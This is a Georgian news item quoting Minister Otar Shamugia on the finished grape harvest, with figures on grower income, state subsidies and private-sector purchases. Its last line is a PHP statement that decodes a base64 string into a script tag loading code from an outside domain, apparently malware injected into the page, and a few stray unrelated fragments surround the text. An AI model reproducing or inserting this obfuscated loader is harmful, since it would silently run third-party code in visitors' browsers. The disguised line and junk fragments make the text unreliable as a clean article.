celsiusi
ავერსი შნაიდერი
„კახეთსა და რაჭაში რთველი, ფაქტობრივად, დასრულებულია და ამ ეტაპზე, მიმდინარეობს ლეჩხუმში. რამდენიმე დღეში პროცესი მთლიანად დასრულდება. ჩვენი მთავარი დაპირება იყო, რომ რთველი ჩატარდებოდა ორგანიზებულად, ყველა მევენახე სრულად ჩააბარებდა ყურძენს და მიიღებდა შემოსავალს. ეს დაპირება შესრულებულია“, - განაცხადა გარემოს დაცვისა და სოფლის მეურნეობის მინისტრმა, ოთარ შამუგიამ მთავრობის სხდომის დასრულების შემდეგ.
 
როგორც მინისტრმა აღნიშნა, რთველმა ჩაიარა ორგანიზებულად; კახეთის რეგიონში, დაახლოებით, 21 ათასზე მეტმა მევენახემ 250 მლნ ლარის შემოსავალი მიიღო.
 
დაახლოებით 11 მლნ ლარის შემოსავალი მიიღეს მევენახეებმა რაჭაში. მთლიანობაში, სახელმწიფოს მხრიდან რთველის მხარდაჭერისთვის მიმართული რესურსი, რთველის სუბსიდირების პროგრამის ფარგლებში, რომელიც მთავრობის გადაწყვეტილებით განხორციელდა, დაახლოებით, 100 მლნ ლარს შეადგენს.
 
„მინდა, ვისარგებლო შემთხვევით და თითოეულ მევენახეს, რომელმაც გაწია შრომა, რომ მიეღო მოსავალი, გადავუხადო მადლობა. ასევე, მინდა მადლობა გადავუხადო იმ უწყებებს, ვინც ჩართული იყო პროცესში - ღვინის ეროვნულ სააგენტოს, ასევე, ადგილობრივ ხელისუფლებას, ყველას, ვინც ჩართული იყო, რათა ჩვენს მევენახეებს საშუალება ჰქონოდათ, ორგანიზებულად, წარმატებულად და შეფერხებების გარეშე ჩაებარებინათ ყურძენი. ერთი მნიშვნელოვანი ფაქტორი, რაც უნდა აღინიშნოს - ჩვენ მიერ განხორციელებული ღონისძიებების და ინიციატივების შედეგად, ჩვენ შევძელით, რაც იყო კიდეც დაპირება, რომ კერძო სექტორის ჩართულობა მაქსიმალურად გაგვეზარდა.
 
რაჭაში მოსავლის თითქმის 100% კერძო სექტორმა ჩაიბარა, ხოლო კახეთს რაც შეეხება, დაახლოებით, 75% -ზე მეტი ყურძენი ჩაბარებული იქნა კერძო კომპანიების მიერ. ეს ჯანსაღი პროცესია. ძალიან მნიშვნელოვანია, რომ პროცესში სახელმწიფოს ჩართულობა იყოს უფრო ნაკლები და კერძო სექტორმა მიიღოს, გადაამუშაოს ყურძენი და აწარმოოს ღვინო. რა თქმა უნდა, ჩვენ ხელს ვუწყობთ ღვინის ექსპორტის ზრდას, პოპულარიზაციას, ხელს ვუწყობთ ბაზრების დივერსიფიცირებას, არაერთ მილიონ ლარს ვხარჯავთ, რომ ჩვენი ღვინის პოპულარობა გაიზარდოს პრიორიტეტულ ბაზრებზე. ამ პროცესს გავაგრძელებთ მომავალ წელსაც და უფრო მეტ რესურსებს მივმართავთ იმისთვის, რომ კიდევ უფრო მეტ ბაზარზე იყოს ჩვენი ქართული ღვინო წარმოდგენილი“, - აღნიშნა ოთარ შამუგიამ.
423
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");